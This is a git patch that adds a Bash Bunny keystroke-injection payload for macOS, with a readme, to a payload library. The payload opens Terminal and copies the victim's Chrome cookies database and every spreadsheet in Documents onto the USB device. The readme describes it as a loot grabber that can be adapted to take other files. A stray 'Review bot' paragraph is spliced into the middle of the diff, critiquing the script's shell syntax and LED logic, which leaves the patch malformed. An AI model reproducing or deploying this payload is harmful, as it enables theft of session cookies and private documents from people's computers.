From adb87d9919daad551ebaac5ca90389708e238f9d Mon Sep 17 00:00:00 2001
From: bobmcdouble3
Date: Wed, 8 Mar 2017 18:27:47 -0500
Subject: [PATCH] Add files via upload
---
payloads/library/macinfograbber/payload.txt | 33 +++++++++++++++++++++
payloads/library/macinfograbber/readme.md | 20 +++++++++++++
2 files changed, 53 insertions(+)
create mode 100644 payloads/library/macinfograbber/payload.txt
create mode 100644 payloads/library/macinfograbber/readme.md
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
new file mode 100644
index 0000000..e63b44f
--- /dev/null
+++ b/payloads/library/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
new file mode 100644
index 0000000..2222832
--- /dev/null
+++ b/payloads/library/macinfograbber/readme.md
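Review bot: The closing bracket in `if [ "$files" != "0" -o "$files2" != "0"]` is fused to the last operand, so `[` receives `0]` instead of a final `]`, fails with a syntax error, and the `else` branch runs every time; the LED therefore always ends red whatever the two counts are. Splitting the test fixes this and also drops the obsolescent `-o`: `if [ "$files" != "0" ] || [ "$files2" != "0" ]; then`. Separately, `LED G` under `# Green LED for finished` is overwritten at once by the branch below it, so the green state listed in the readme's status table is never observable. Either remove that line or reword the comment to say the final colour is set by the check that follows.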
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Green | Attack Finished |
+| Purple | Successfully grabbed xls or xlsx files |
+| RED | Did not get any xls or xlsx files |